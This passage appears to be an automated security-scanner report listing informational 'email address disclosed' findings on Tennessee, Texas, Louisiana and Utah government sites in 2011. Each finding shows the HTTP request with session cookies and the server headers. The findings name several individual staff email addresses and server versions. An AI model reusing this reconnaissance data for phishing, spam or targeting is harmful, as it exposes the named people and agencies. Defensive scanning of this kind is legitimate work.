   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a href="mailto:anti.spam@tn.gov" class="hide">anti.spam@tn.gov</a>
...[SNIP]...

22.201. https://www.tennesseeanytime.org/pmnout/notice/listByMonth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /pmnout/notice/listByMonth

Issue detail

The following email address was disclosed in the response:

Request

GET /pmnout/notice/listByMonth?year=2011&month=4&day=29 HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:07 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<a href="mailto:anti.spam@tn.gov" class="hide">anti.spam@tn.gov</a>
...[SNIP]...

22.202. http://www.texas.gov/en/Pages/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texas.gov
Path:   /en/Pages/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /en/Pages/default.aspx HTTP/1.1
Host: www.texas.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AspxAutoDetectCookieSupport=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Fri, 15 Apr 2011 11:14:06 GMT
Last-Modified: Sat, 30 Apr 2011 11:14:06 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SPRequestGuid: c52f4f5f-5277-4617-8ad3-13642faeec36
X-SharePointHealthScore: 0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.5123
Date: Sat, 30 Apr 2011 11:14:06 GMT
Content-Length: 36506


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="no-js" __expr-val-dir="ltr" dir="ltr"><head><meta name="GENERATOR" content="Micro
...[SNIP]...
<a href="mailto:txgov@dir.texas.gov">
...[SNIP]...

22.203. http://www.tn.gov/apps/js/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /apps/js/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/controls.js HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:22 GMT
Server: Apache
Last-Modified: Tue, 20 Apr 2010 22:25:21 GMT
ETag: "36c7f-8834-8d915640"
Accept-Ranges: bytes
Content-Length: 34868
Content-Type: application/javascript

// script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

22.204. http://www.tn.gov/apps/js/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /apps/js/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/dragdrop.js HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:21 GMT
Server: Apache
Last-Modified: Tue, 20 Apr 2010 22:25:21 GMT
ETag: "3565f-7b75-8d915640"
Accept-Ranges: bytes
Content-Length: 31605
Content-Type: application/javascript

// script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

22.205. http://www.tn.gov/bopp/bopp_bo_contents.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /bopp/bopp_bo_contents.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /bopp/bopp_bo_contents.htm HTTP/1.1
Host: www.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:44 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 21260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:BOPP.Webmail@tn.gov">BOPP.Webmail@tn.gov</a>
...[SNIP]...

22.206. http://www.tn.gov/governor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /governor/

Issue detail

The following email address was disclosed in the response:

Request

GET /governor/ HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:10 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 15:25:06 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 20209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="mailto:anti.spam@tn.gov" class="hide">anti.spam@tn.gov</a>
...[SNIP]...

22.207. http://www.tn.gov/maintenance.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /maintenance.html

Issue detail

The following email address was disclosed in the response:

Request

GET /maintenance.html HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:43 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 27393
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<a href="mailto:anti.spam@tn.gov" class="hide">anti.spam@tn.gov</a>
...[SNIP]...

22.208. http://www.tn.gov/revenue/forms/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/forms/index.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/forms/index.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:20 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 18:54:25 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.209. http://www.tn.gov/revenue/onlinefiling/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/onlinefiling/ HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://tn.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:11 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:16 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 16907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.210. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/businesstax/biztaxonlinefiling.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/onlinefiling/businesstax/biztaxonlinefiling.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:26 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:08:45 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 15193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.211. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/businesstax/biztaxregister.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/onlinefiling/businesstax/biztaxregister.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/onlineregister.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:41 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:08:45 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.212. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/businesstax/bustaxefile.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/onlinefiling/businesstax/bustaxefile.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:37 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:08:45 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 13779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.213. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/onlineregister.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/onlinefiling/onlineregister.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:39 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:16 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.214. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/salesanduse/electronicfiling.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/onlinefiling/salesanduse/electronicfiling.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:17 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:03 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.215. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/salesanduse/salestaxefile.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /revenue/onlinefiling/salesanduse/salestaxefile.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:35 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:03 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 13795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
<a href="mailto:TN.Revenue@tn.gov">TN.Revenue@tn.gov</a>
...[SNIP]...

22.216. http://www.treasury.louisiana.gov/Home%20Pages/BondCommission.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.treasury.louisiana.gov
Path:   /Home%20Pages/BondCommission.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Home%20Pages/BondCommission.aspx HTTP/1.1
Host: www.treasury.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6219
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Expires: Fri, 15 Apr 2011 12:41:20 GMT
Last-Modified: Sat, 30 Apr 2011 12:41:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 61600

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HEAD><meta name="GENERATOR" content="Micros
...[SNIP]...
<a href="mailto:wkling@treasury.state.la.us">wkling@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:lfolse@treasury.state.la.us">lfolse@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:wsittig@treasury.state.la.us">wsittig@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:swright@treasury.state.la.us">swright@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:cchen@treasury.state.la.us">cchen@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:jaizprua@treasury.state.la.us">jaizprua@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:cberthelot@treasury.state.la.us">cberthelot@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:cmatthews@treasury.state.la.us">cmatthews@treasury.state.la.us</a>
...[SNIP]...
<a href="mailto:wkling@treasury.state.la.us">wkling@treasury.state.la.us</a>
...[SNIP]...

22.217. http://www.utah.gov/governor/news_media/article.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /governor/news_media/article.html

Issue detail

The following email address was disclosed in the response:

Request

GET /governor/news_media/article.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:50 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 6227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="mailto:&#098;&#115;&#111;&#109;&#101;&#114;&#115;&#064;&#117;&#116;&#097;&#104;&#046;&#103;&#111;&#118;">bsomers@utah.gov</a>
...[SNIP]...

22.218. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /js/DD_roundies_0.0.2a-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/DD_roundies_0.0.2a-min.js HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:52 GMT
Server: Apache
Last-Modified: Mon, 11 Oct 2010 22:27:40 GMT
ETag: "895e75-20ed-4925ede3d8f00"
Accept-Ranges: bytes
Content-Length: 8429
Content-Type: application/javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Us
...[SNIP]...

22.219. http://www.utah.gov/js/jquery.scrollable.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /js/jquery.scrollable.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.scrollable.min.js HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:52 GMT
Server: Apache
Last-Modified: Mon, 11 Oct 2010 22:27:40 GMT
ETag: "895fe1-1063-4925ede3d8f00"
Accept-Ranges: bytes
Content-Length: 4195
Content-Type: application/javascript

/**
* jquery.scrollable 0.11. Making HTML elements scroll.
*
* http://flowplayer.org/tools/scrollable.html
*
* Copyright (c) 2008 Tero Piirainen (tero@flowplayer.org)
*
* Released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* >
...[SNIP]...

